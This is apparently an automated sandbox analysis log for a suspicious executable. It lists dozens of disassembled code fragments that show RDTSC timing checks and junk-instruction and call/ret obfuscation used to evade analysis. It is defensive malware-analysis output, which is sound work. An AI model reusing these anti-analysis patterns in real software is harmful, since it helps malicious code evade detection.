Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7372B6 second address: 7372C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F36ED361E0Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7372C4 second address: 7372F0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F36EC8543C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d je 00007F36EC8543E4h 0x00000013 pushad 0x00000014 jmp 00007F36EC8543D6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73AE30 second address: 73AE44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F36ED361E06h 0x0000000e jno 00007F36ED361E06h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73AE44 second address: 73AE4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73AE4A second address: 73AE76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jl 00007F36ED361E06h 0x0000000f jmp 00007F36ED361E0Eh 0x00000014 push eax 0x00000015 pop eax 0x00000016 jmp 00007F36ED361E0Ch 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73AE76 second address: 73AE88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnp 00007F36EC8543C6h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73AE88 second address: 73AE8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73B78B second address: 73B7AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36EC8543D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73C6D7 second address: 73C6DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73B7AC second address: 73B7B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73D413 second address: 73D45C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ebp 0x00000009 call 00007F36ED361E08h 0x0000000e pop ebp 0x0000000f mov dword ptr [esp+04h], ebp 0x00000013 add dword ptr [esp+04h], 00000016h 0x0000001b inc ebp 0x0000001c push ebp 0x0000001d ret 0x0000001e pop ebp 0x0000001f ret 0x00000020 xor bx, 7A51h 0x00000025 mov edi, 5A18C6DBh 0x0000002a push 00000000h 0x0000002c sub dword ptr [ebp+122D1CF0h], eax 0x00000032 push 00000000h 0x00000034 mov ebx, dword ptr [ebp+122D2AD3h] 0x0000003a xchg eax, esi 0x0000003b je 00007F36ED361E14h 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73D45C second address: 73D460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73E2DE second address: 73E388 instructions: 0x00000000 rdtsc 0x00000002 js 00007F36ED361E0Ch 0x00000008 jg 00007F36ED361E06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F36ED361E08h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 00000016h 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d jmp 00007F36ED361E18h 0x00000032 pushad 0x00000033 mov dword ptr [ebp+122D1865h], edi 0x00000039 and ebx, 261E3F9Eh 0x0000003f popad 0x00000040 jns 00007F36ED361E0Ch 0x00000046 push 00000000h 0x00000048 or dword ptr [ebp+12455D2Eh], edi 0x0000004e push 00000000h 0x00000050 mov dword ptr [ebp+12472298h], eax 0x00000056 pushad 0x00000057 jnl 00007F36ED361E0Ch 0x0000005d popad 0x0000005e xchg eax, esi 0x0000005f jmp 00007F36ED361E14h 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007F36ED361E11h 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73F33D second address: 73F389 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F36EC8543CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edi, esi 0x0000000f push 00000000h 0x00000011 mov edi, dword ptr [ebp+122D2937h] 0x00000017 jp 00007F36EC8543CBh 0x0000001d adc bx, 3898h 0x00000022 push 00000000h 0x00000024 mov dword ptr [ebp+12455BACh], eax 0x0000002a xchg eax, esi 0x0000002b jmp 00007F36EC8543CCh 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 jo 00007F36EC8543CCh 0x00000039 jo 00007F36EC8543C6h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73E4F6 second address: 73E503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F36ED361E06h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73F389 second address: 73F38E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73E503 second address: 73E52C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F36ED361E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007F36ED361E1Bh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73E52C second address: 73E531 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73E531 second address: 73E537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73E537 second address: 73E5DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 sub ebx, 0CB0E7A4h 0x0000000e jbe 00007F36EC8543C8h 0x00000014 push dword ptr fs:[00000000h] 0x0000001b stc 0x0000001c jmp 00007F36EC8543D2h 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 push 00000000h 0x0000002a push edi 0x0000002b call 00007F36EC8543C8h 0x00000030 pop edi 0x00000031 mov dword ptr [esp+04h], edi 0x00000035 add dword ptr [esp+04h], 00000018h 0x0000003d inc edi 0x0000003e push edi 0x0000003f ret 0x00000040 pop edi 0x00000041 ret 0x00000042 movzx ebx, ax 0x00000045 push eax 0x00000046 mov dword ptr [ebp+122D1A4Eh], esi 0x0000004c pop edi 0x0000004d mov eax, dword ptr [ebp+122D0DC5h] 0x00000053 push 00000000h 0x00000055 push esi 0x00000056 call 00007F36EC8543C8h 0x0000005b pop esi 0x0000005c mov dword ptr [esp+04h], esi 0x00000060 add dword ptr [esp+04h], 00000014h 0x00000068 inc esi 0x00000069 push esi 0x0000006a ret 0x0000006b pop esi 0x0000006c ret 0x0000006d mov edi, edx 0x0000006f push FFFFFFFFh 0x00000071 add ebx, 47071085h 0x00000077 adc bx, D7B1h 0x0000007c push eax 0x0000007d pushad 0x0000007e push eax 0x0000007f push edx 0x00000080 jmp 00007F36EC8543D1h 0x00000085 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7411F8 second address: 7411FE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7411FE second address: 741215 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F36EC8543D2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 745030 second address: 745043 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F36ED361E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jp 00007F36ED361E06h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 746078 second address: 74607E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74607E second address: 7460D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 mov edi, edx 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F36ED361E08h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push ebp 0x0000002b call 00007F36ED361E08h 0x00000030 pop ebp 0x00000031 mov dword ptr [esp+04h], ebp 0x00000035 add dword ptr [esp+04h], 00000014h 0x0000003d inc ebp 0x0000003e push ebp 0x0000003f ret 0x00000040 pop ebp 0x00000041 ret 0x00000042 push eax 0x00000043 pushad 0x00000044 pushad 0x00000045 jns 00007F36ED361E06h 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74235A second address: 742388 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36EC8543D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F36EC8543D2h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7451FF second address: 745206 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7452C1 second address: 7452DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F36EC8543D9h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7452DF second address: 7452F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jng 00007F36ED361E06h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 743267 second address: 74326D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 746FE7 second address: 746FEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 742388 second address: 742411 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F36EC8543C8h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 push dword ptr fs:[00000000h] 0x0000002a push 00000000h 0x0000002c push esi 0x0000002d call 00007F36EC8543C8h 0x00000032 pop esi 0x00000033 mov dword ptr [esp+04h], esi 0x00000037 add dword ptr [esp+04h], 0000001Bh 0x0000003f inc esi 0x00000040 push esi 0x00000041 ret 0x00000042 pop esi 0x00000043 ret 0x00000044 stc 0x00000045 call 00007F36EC8543CDh 0x0000004a cld 0x0000004b pop ebx 0x0000004c mov dword ptr fs:[00000000h], esp 0x00000053 movzx edi, dx 0x00000056 mov eax, dword ptr [ebp+122D04ADh] 0x0000005c movsx edi, dx 0x0000005f push FFFFFFFFh 0x00000061 mov ebx, dword ptr [ebp+122D24ADh] 0x00000067 push eax 0x00000068 pushad 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 746FEE second address: 747002 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F36ED361E08h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 742411 second address: 742415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 747002 second address: 747007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 747007 second address: 747085 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F36EC8543C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F36EC8543C8h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 add di, 2E62h 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edx 0x0000002f call 00007F36EC8543C8h 0x00000034 pop edx 0x00000035 mov dword ptr [esp+04h], edx 0x00000039 add dword ptr [esp+04h], 00000018h 0x00000041 inc edx 0x00000042 push edx 0x00000043 ret 0x00000044 pop edx 0x00000045 ret 0x00000046 mov edi, eax 0x00000048 push 00000000h 0x0000004a push 00000000h 0x0000004c push eax 0x0000004d call 00007F36EC8543C8h 0x00000052 pop eax 0x00000053 mov dword ptr [esp+04h], eax 0x00000057 add dword ptr [esp+04h], 0000001Bh 0x0000005f inc eax 0x00000060 push eax 0x00000061 ret 0x00000062 pop eax 0x00000063 ret 0x00000064 push eax 0x00000065 push esi 0x00000066 push eax 0x00000067 push edx 0x00000068 pushad 0x00000069 popad 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 747085 second address: 747089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 748030 second address: 748035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74917D second address: 7491FC instructions: 0x00000000 rdtsc 0x00000002 je 00007F36ED361E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c jmp 00007F36ED361E16h 0x00000011 nop 0x00000012 mov edi, esi 0x00000014 mov bl, ch 0x00000016 push dword ptr fs:[00000000h] 0x0000001d push 00000000h 0x0000001f push eax 0x00000020 call 00007F36ED361E08h 0x00000025 pop eax 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a add dword ptr [esp+04h], 00000015h 0x00000032 inc eax 0x00000033 push eax 0x00000034 ret 0x00000035 pop eax 0x00000036 ret 0x00000037 mov bx, 89B6h 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 pushad 0x00000043 mov di, ax 0x00000046 mov dword ptr [ebp+12455C0Dh], esi 0x0000004c popad 0x0000004d mov eax, dword ptr [ebp+122D0189h] 0x00000053 add dword ptr [ebp+122D246Dh], edi 0x00000059 push FFFFFFFFh 0x0000005b jbe 00007F36ED361E0Bh 0x00000061 and di, 136Ah 0x00000066 push eax 0x00000067 push edi 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74B506 second address: 74B523 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F36EC8543CCh 0x0000000c popad 0x0000000d push eax 0x0000000e ja 00007F36EC8543CEh 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74F3E7 second address: 74F3F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74F3F0 second address: 74F3F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74F3F4 second address: 74F413 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jns 00007F36ED361E06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007F36ED361E0Fh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74F413 second address: 74F436 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36EC8543D5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F36EC8543C6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6E42F6 second address: 6E42FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6E42FA second address: 6E42FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6E42FE second address: 6E4306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6E4306 second address: 6E430E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6F34EC second address: 6F34F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 752DC6 second address: 752DD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F36EC8543CEh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 752F14 second address: 752F27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a ja 00007F36ED361E06h 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75790C second address: 757913 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7579F8 second address: 757A10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36ED361E10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 757A10 second address: 757A2B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36EC8543CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75BE07 second address: 75BE0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75BE0C second address: 75BE17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F36EC8543C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75C766 second address: 75C781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36ED361E17h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75C781 second address: 75C796 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F36EC8543CCh 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75C796 second address: 75C7A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F36ED361E06h 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75C902 second address: 75C906 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75C906 second address: 75C912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F36ED361E06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75C912 second address: 75C933 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36EC8543D9h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75C933 second address: 75C937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75CAAD second address: 75CAB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75CAB1 second address: 75CAB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75CEB6 second address: 75CEBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75CEBC second address: 75CEC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75CEC0 second address: 75CEC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75CEC6 second address: 75CED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jg 00007F36ED361E06h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75CED9 second address: 75CEFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36EC8543D4h 0x00000009 popad 0x0000000a jl 00007F36EC8543C8h 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75CEFA second address: 75CF01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6E5D73 second address: 6E5D77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6E5D77 second address: 6E5D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6E5D7D second address: 6E5D90 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F36EC8543CEh 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6E5D90 second address: 6E5DC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007F36ED361E19h 0x0000000d jmp 00007F36ED361E0Fh 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6E5DC9 second address: 6E5DD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 762941 second address: 76295B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36ED361E15h 0x00000009 pop edi 0x0000000a rdtsc
